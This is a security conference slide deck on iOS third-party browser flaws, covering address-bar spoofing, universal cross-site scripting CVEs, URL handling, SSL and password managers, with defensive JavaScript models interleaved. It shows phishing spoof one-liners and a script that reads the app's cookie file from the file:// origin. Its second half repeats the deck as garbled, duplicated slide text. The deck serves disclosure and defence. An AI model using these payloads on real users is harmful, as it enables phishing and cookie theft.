Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
SyScan360 2014
This presentation expresses our private opinions.
The sample attacks against Google and PayPal users demonstrated in this presentation are based on vulnerabilities in the browsers, not in these websites.
Thank you: Marek Zmysłowski, Aleksander Droś
In this presentation
• iOS Browsers: UIWebView & WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
iOS Browsers
iOS Browser == Mobile Safari
• iOS App Store Review Guidelines: „Apps that browse the web must use the iOS WebKit framework and WebKit Javascript”
iOS Third-Party Browsers (> 60 browsers in the App Store):
• WebView-based
• Proxy-rendering
UIWebView & WKWebView
UIWebView API
• loadRequest:
• loadHTMLString:baseURL:
• loadData:MIMEType:textEncodingName:baseURL:
• goBack / goForward / stopLoading / reload
• request (read-only)
• stringByEvaluatingJavaScriptFromString: runs in the origin of the currently loaded request.mainDocumentURL; no access to subframes from a domain other than the top document (e.g. top document http://example.com, subframe http://hidden.tld)
JavaScript is used to implement browser features and to override native functions in order to bridge them with Objective-C code.
UIWebViewDelegate
• webView:shouldStartLoadWithRequest:navigationType:
• webViewDidStartLoad:
• webViewDidFinishLoad:
• webView:didFailLoadWithError:
iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)
Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)
Testing
• Inspiration from Browser Security Handbook
• Retesting previous Mobile Safari bugs
• “Black-box” testing from web perspective, review of JavaScript code, a bit of reversing / debugging
• Cross-browser test cases: https://iosbrowsr-tests.com
Address Bar Spoofing
Address bar spoofing: look-alike (IDN etc.) vs. URL tracking desynchronization
URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Address Bar Spoofing: Untracked Content
Replace window content with untracked content; document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise window with target URL, replace with phishing content before it loads.
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
Incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display phishing page, then redirect to the “incorrect” URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts
Address Bar Spoofing: Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function(){ location = 'https://accounts.google.com:8443/' }, …)
Address Bar Spoofing: Title bar
A phishing page can put a URL into its <title>, e.g. <title>https://www.apple.com</title>, so that the browser's title bar shows what looks like an address (screenshot: phishing page, title bar).
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
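The address bar tips above, as an added example that is not from the slides: a Node-runnable JavaScript model of an address bar driven only by UIWebViewDelegate-style events. The method names mirror the delegate callbacks; `tlsValidated` is an assumed flag that the app's own TLS layer would have to supply (UIWebView does not expose it), and the scenarios are constructed, not captured from any browser.

```javascript
'use strict';

// Address-bar state that follows UIWebViewDelegate events and nothing else.
// `tlsValidated` is an assumed input from the app's TLS layer.
function createAddressBar() {
  const state = { shown: '', lock: false, loading: false, error: null };

  return {
    // webView:shouldStartLoadWithRequest:navigationType:
    // The attempt is shown, but it is only an attempt: no lock yet.
    shouldStartLoad(url) {
      Object.assign(state, { shown: url, lock: false, loading: true, error: null });
      return true;
    },
    // webViewDidStartLoad:
    didStartLoad() {
      state.loading = true;
    },
    // webViewDidFinishLoad:
    // Pass webView.request.mainDocumentURL, i.e. what actually loaded,
    // never the URL remembered from shouldStartLoad.
    didFinishLoad(mainDocumentURL, tlsValidated) {
      state.shown = mainDocumentURL;
      state.loading = false;
      state.error = null;
      state.lock = mainDocumentURL.startsWith('https://') && tlsValidated === true;
    },
    // webView:didFailLoadWithError:
    // Update here as well; otherwise the failed URL keeps looking loaded.
    didFailLoad(failedURL, error) {
      Object.assign(state, { shown: failedURL, lock: false, loading: false, error: String(error) });
    },
    snapshot() {
      return { ...state };
    }
  };
}

// Replays an event list and returns the final address-bar state.
function replay(events) {
  const bar = createAddressBar();
  for (const ev of events) {
    bar[ev.type](...(ev.args || []));
  }
  return bar.snapshot();
}

// Constructed scenarios (not captures from any browser).
const SCENARIOS = {
  // Loading loop: navigation to a filtered port that never connects.
  loadingLoop: [
    { type: 'shouldStartLoad', args: ['https://accounts.google.com:8443/'] },
    { type: 'didStartLoad' },
    { type: 'didFailLoad', args: ['https://accounts.google.com:8443/', 'NSURLErrorTimedOut'] }
  ],
  // Failed navigation: NXDOMAIN after a phishing page was displayed.
  nxdomain: [
    { type: 'shouldStartLoad', args: ['https://login.target.tld/'] },
    { type: 'didFailLoad', args: ['https://login.target.tld/', 'NSURLErrorCannotFindHost'] }
  ],
  // Genuine https load with a validated certificate.
  goodTls: [
    { type: 'shouldStartLoad', args: ['https://example.com/'] },
    { type: 'didStartLoad' },
    { type: 'didFinishLoad', args: ['https://example.com/', true] }
  ],
  // https URL whose certificate the app accepted without validation.
  badTls: [
    { type: 'shouldStartLoad', args: ['https://example.com/'] },
    { type: 'didFinishLoad', args: ['https://example.com/', false] }
  ]
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, events] of Object.entries(SCENARIOS)) {
    console.log(name, replay(events));
  }
}
```

What the model cannot do is also the point of the first tip: a page that replaces its own content with document.write() fires no delegate event at all, so the bar keeps showing the last loaded URL. The only native-side signal for that case is webView.request.mainDocumentURL, which is why the displayed URL has to be read from the web view rather than remembered from the request.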
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007
Universal Cross-Site Scripting
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
How a cross-tab call travels through the JavaScript-to-native bridge:
w = window.open('about:blank')
  → mbexec$(WINDOW_ID)[{ command: "window.open", target: 1234, url: "about:blank" }]   (target id from Math.random())
  → [webView loadRequest:… "about:blank" …]
  cross-frame forgery
w.document.write('Hi')
  → mbexec$(WINDOW_ID)[{ command: "window.document.write", target: 1234, html: "Hi" }]
  → [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any, at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>')
… and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome for iOS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of “no URL”, right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
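For the Mercury, Yandex and Chrome cases above, an added example that is not from the slides or from any of those browsers: a Node-runnable JavaScript model of the native side of a window.open() / w.document.write() tab bridge. originOf() shows why about:blank, file:// and applewebdata:// must never be treated as a normal origin, safeBaseURL() stands in for the loadHTMLString:baseURL: fix (never nil), and the recheckAtWrite option reproduces the Yandex time-of-check flaw next to the fixed behaviour. Tab ids, the navigate() helper and all URLs are constructed for illustration.

```javascript
'use strict';

// Origin of a URL for a cross-tab scripting decision. The WHATWG URL parser
// returns the string "null" for about:blank, file://, applewebdata:// and
// any other scheme without a host-based origin; such origins are opaque and
// are never accepted as caller or target.
function originOf(url) {
  try {
    const origin = new URL(url).origin;
    return origin === 'null' ? null : origin;
  } catch (e) {
    return null;   // the case where [NSURL URLWithString:] would give nil
  }
}

// baseURL for content written into a child window via loadHTMLString:baseURL:.
// Falls back to the literal about:blank whenever the requested base would not
// parse or has no real origin; a nil baseURL would land in applewebdata://.
function safeBaseURL(requested) {
  return originOf(requested) === null ? 'about:blank' : requested;
}

// Model of the native half of a window.open() / w.document.write() bridge.
// A tab is { id, url, baseURL, html, allowedAtOpen }; navigate() stands in
// for a redirect of the child window after window.open().
function createTabBridge() {
  const tabs = new Map();
  let nextId = 1;

  return {
    open(openerURL, url) {
      const id = nextId++;
      const caller = originOf(openerURL);
      tabs.set(id, {
        id,
        url,
        baseURL: safeBaseURL(url),
        html: '',
        // Decided once, at window.open() time: the check that is not enough.
        allowedAtOpen: caller !== null && caller === originOf(url)
      });
      return id;
    },

    navigate(id, url) {
      tabs.get(id).url = url;
    },

    // recheckAtWrite = false reproduces the time-of-check flaw;
    // true (the default) compares against the tab's current URL.
    documentWrite(openerURL, id, html, { recheckAtWrite = true } = {}) {
      const target = tabs.get(id);
      if (!target) return { allowed: false, reason: 'no such tab' };

      let allowed;
      if (recheckAtWrite) {
        const caller = originOf(openerURL);
        const dest = originOf(target.url);
        allowed = caller !== null && dest !== null && caller === dest;
      } else {
        allowed = target.allowedAtOpen;
      }
      if (!allowed) {
        return { allowed: false, reason: `${openerURL} may not script ${target.url}` };
      }
      target.html = html;   // a real bridge would call stringByEvaluatingJavaScriptFromString: here
      return { allowed: true, baseURL: target.baseURL };
    },

    get(id) {
      return tabs.get(id);
    }
  };
}
```

The model is deliberately stricter than WebKit about about:blank: in a real browser a blank child inherits its opener's origin, but a bolted-on bridge has no reliable way to know that the blank tab is still the one it created, so refusing to script any tab without a host-based origin and loading written content with an explicit about:blank base is the conservative choice the slide recommends.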
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] → nil when the string cannot be parsed as a URL
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL for the same reason
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename *.html
JS without Same-Origin-Policy
Read the app's cookie store from a page that ended up in the file:// origin (a[3]..a[7] are the path components up to the app sandbox directory):
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);   // synchronous, so responseText is ready after send()
  x.send();
  alert(x.responseText);
}
</script>
Read a cross-origin resource (e.g. an intranet host) from a page without the same-origin policy:
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes: Application (bolted-on), Native (WebKit), Bridge (internal), Registered (external)
• scheme://download?https://secure.tld/victim/data, scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with the privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
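The password manager points above, as an added example that is not from the slides or from any browser: a Node-runnable JavaScript comparison of the weak domain-only fill check with a stricter one that matches the full origin (scheme, host, port), fills only in the top frame and, for https, only after TLS validation, and stores submitted credentials under the origin of the document that contained the form rather than under the form's action URL. The isTopFrame and tlsValidated inputs are assumptions standing in for what the app's native layer knows; the credential store is constructed.

```javascript
'use strict';

// Origin (scheme + host + port) of a URL; null for opaque origins such as
// about:blank, file:// and applewebdata://, and for unparseable strings.
function originOf(url) {
  try {
    const origin = new URL(url).origin;
    return origin === 'null' ? null : origin;
  } catch (e) {
    return null;
  }
}

// Constructed credential store; entries are keyed by full origin.
const STORE = [
  { origin: 'https://accounts.google.com', user: 'alice@example.com', secret: 'constructed-secret' }
];

// The weak check the slides describe: hostname only, scheme and port ignored.
function weakFillMatch(entry, pageURL) {
  return new URL(entry.origin).hostname === new URL(pageURL).hostname;
}

// Stricter decision. ctx = { pageURL, isTopFrame, tlsValidated }.
// isTopFrame: JavaScript injected with stringByEvaluatingJavaScriptFromString:
// only sees the top frame, so subframe forms are never filled.
// tlsValidated: assumed flag from the app's TLS layer; an https origin is
// filled only after a valid handshake.
function fillDecision(entry, ctx) {
  if (!ctx.isTopFrame) return { fill: false, reason: 'form not in top frame' };
  const origin = originOf(ctx.pageURL);
  if (origin === null) return { fill: false, reason: 'opaque origin' };
  if (origin !== entry.origin) {
    return { fill: false, reason: `origin ${origin} does not match ${entry.origin}` };
  }
  if (origin.startsWith('https://') && ctx.tlsValidated !== true) {
    return { fill: false, reason: 'certificate not validated' };
  }
  return { fill: true, reason: 'ok' };
}

// Returns the entry to autofill for this page context, or null.
function lookup(store, ctx) {
  for (const entry of store) {
    if (fillDecision(entry, ctx).fill) return entry;
  }
  return null;
}

// Where a submitted credential is stored: under the origin of the document
// containing the form, never under the form's action URL, so a page cannot
// force a save for another domain. A cross-origin action is still allowed,
// but flagged so the UI asks the user before saving.
function saveDecision(formDocumentURL, formActionURL, isTopFrame) {
  if (!isTopFrame) return { save: false, key: null, confirm: false };
  const key = originOf(formDocumentURL);
  if (key === null) return { save: false, key: null, confirm: false };
  const actionOrigin = originOf(formActionURL);
  return { save: true, key, confirm: actionOrigin !== key };
}
```

The scheme check falls out of comparing whole origins: a credential saved for https://accounts.google.com is never offered on http://accounts.google.com, while the hostname-only check matches both, which is exactly the gap the third bullet describes.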
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://iosbrowsr-tests.com
Questions
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Mobile Browsers Security iOS
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
